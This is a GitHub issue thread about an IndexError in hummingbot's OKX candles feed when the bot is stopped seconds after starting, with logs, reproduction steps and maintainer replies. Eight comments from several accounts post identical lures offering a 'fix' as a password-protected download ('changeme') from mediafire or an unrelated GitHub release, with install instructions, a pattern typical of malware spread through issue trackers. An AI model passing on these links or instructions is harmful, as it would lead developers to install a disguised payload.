### ISSUE TITLE
Okx - Unexpected error occurred when getting historical klines.

### ISSUE THREAD

**Issue by rapcmia** [hummingbot/hummingbot#7195]
### Describe the bug

When testing the connector with pmm_dynamic controller, we got this error when stop command is initiated few seconds after getting it started

![image](https://github.com/user-attachments/assets/243d7bc0-e7bf-4cdc-b094-b01b6572a2bc)

```

2024-08-27 19:45:34,278 - 12363 - hummingbot.client.hummingbot_application - INFO - Creating the clock with tick size: 1.0
2024-08-27 19:45:34,281 - 12363 - hummingbot.client.hummingbot_application - INFO - start command initiated.
2024-08-27 19:45:34,540 - 12363 - hummingbot.data_feed.candles_feed.okx_spot_candles.okx_spot_candles - INFO - Network status has changed to NetworkStatus.CONNECTED. Starting networking...
2024-08-27 19:45:34,721 - 12363 - hummingbot.connector.exchange.okx.okx_exchange.OkxExchange - INFO - Network status has changed to NetworkStatus.CONNECTED. Starting networking...
2024-08-27 19:45:34,841 - 12363 - hummingbot.core.data_type.order_book_tracker - INFO - Initialized order book for NOT-USDT. 1/1 completed.
2024-08-27 19:45:34,886 - 12363 - hummingbot.data_feed.candles_feed.okx_spot_candles.okx_spot_candles - INFO - Subscribed to public klines...
2024-08-27 19:45:35,052 - 12363 - hummingbot.connector.exchange.okx.okx_api_order_book_data_source.OkxAPIOrderBookDataSource - INFO - Subscribed to public order book and trade channels...
2024-08-27 19:45:35,053 - 12363 - hummingbot.strategy.script_strategy_base - WARNING - okx is not ready. Please wait...
2024-08-27 19:45:35,098 - 12363 - hummingbot.connector.exchange.okx.okx_api_user_stream_data_source.OkxAPIUserStreamDataSource - INFO - Subscribed to private account and orders channels...
2024-08-27 19:45:36,247 - 12363 - hummingbot.core.api_throttler.async_request_context_base - INFO - API rate limit on /api/v5/market/history-candles (20 calls per 2s) has almost reached. Limits used is 20 in the last 2 seconds
2024-08-27 19:45:36,895 - 12363 - hummingbot.core.rate_oracle.rate_oracle - INFO - Network status has changed to NetworkStatus.CONNECTED. Starting networking...
2024-08-27 19:45:37,124 - 12363 - hummingbot.client.hummingbot_application - INFO - stop command initiated.
2024-08-27 19:45:37,229 - 12363 - hummingbot.data_feed.candles_feed.okx_spot_candles.okx_spot_candles - ERROR - Unexpected error occurred when getting historical klines. Retrying in 1 seconds...
Traceback (most recent call last):
  File "/Users/rapcomia/github/hummingbot/hummingbot/7192/hummingbot/data_feed/candles_feed/candles_base.py", line 274, in fill_historical_candles
    end_timestamp = int(self._candles[0][0])
IndexError: deque index out of range
2024-08-27 19:45:38,232 - 12363 - hummingbot.data_feed.candles_feed.okx_spot_candles.okx_spot_candles - ERROR - Unexpected error occurred when getting historical klines. Retrying in 1 seconds...
Traceback (most recent call last):
  File "/Users/rapcomia/github/hummingbot/hummingbot/7192/hummingbot/data_feed/candles_feed/candles_base.py", line 274, in fill_historical_candles
    end_timestamp = int(self._candles[0][0])
IndexError: deque index out of range
```
  - Ran tests with kucoin and binance spot connector and do same but not able to reproduce

Note: Looking for other possible scenarios to reproduce this error on OKX

### Steps to reproduce

1. Setup a pmm_dynamic controller with OKX spot
2. Start the script then stop after 3-5s

### Release version

development 2.0.1

### Type of installation

Source

### Attach required files

[08272024.zip](https://github.com/user-attachments/files/16761709/08272024.zip)

**Comment by nikspz** [comment]
Same issue using okx_perpetual 

Steps to reproduce:
- Setup a pmm_dynamic controller with OKX perpetual
- Start the script then stop after 3-5s


[logs_okxp22sta.log](https://github.com/user-attachments/files/16767701/logs_okxp22sta.log)

[okxp2.zip](https://github.com/user-attachments/files/16767700/okxp2.zip)

```
2024-08-27 13:22:08,746 - 1641613 - hummingbot.data_feed.candles_feed.okx_perpetual_candles.okx_perpetual_candles - ERROR - Unexpected error occurred when getting historical klines. Retrying in 1 seconds...
Traceback (most recent call last):
  File "/home/hummingbot/nikita/staging/hummingbot/data_feed/candles_feed/candles_base.py", line 274, in fill_historical_candles
    end_timestamp = int(self._candles[0][0])
IndexError: deque index out of range
```

![image](https://github.com/user-attachments/assets/a25eaa48-70e0-4936-aa31-5f742574e054)

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by tomasgaudino** [comment]
@rapcmia @nikspz is this still happening?

**Comment by rapcmia** [comment]
hi @tomasgaudino 
yes, im using the latest source build for deploy using pmm_controller and getting the error when I use the `stop` button on dashboard using okx spot
https://www.loom.com/share/c53fa17a9ca745a7b3e160e6c3d438d0

```
2024-09-02 14:19:23,583 - 15 - hummingbot.core.utils.async_utils - ERROR - Unhandled error in background task: object NoneType can't be used in 'await' expression
Traceback (most recent call last):
  File "/home/hummingbot/hummingbot/core/utils/async_utils.py", line 9, in safe_wrapper
    return await c
  File "/home/hummingbot/hummingbot/client/command/stop_command.py", line 33, in stop_loop
    await self.strategy.on_stop()
TypeError: object NoneType can't be used in 'await' expression
```

[hummingbot-test1-2024.09.02_22.16.zip](https://github.com/user-attachments/files/16838761/hummingbot-test1-2024.09.02_22.16.zip)

**Comment by tomasgaudino** [comment]
just identified isssue source, will be creating PR this week
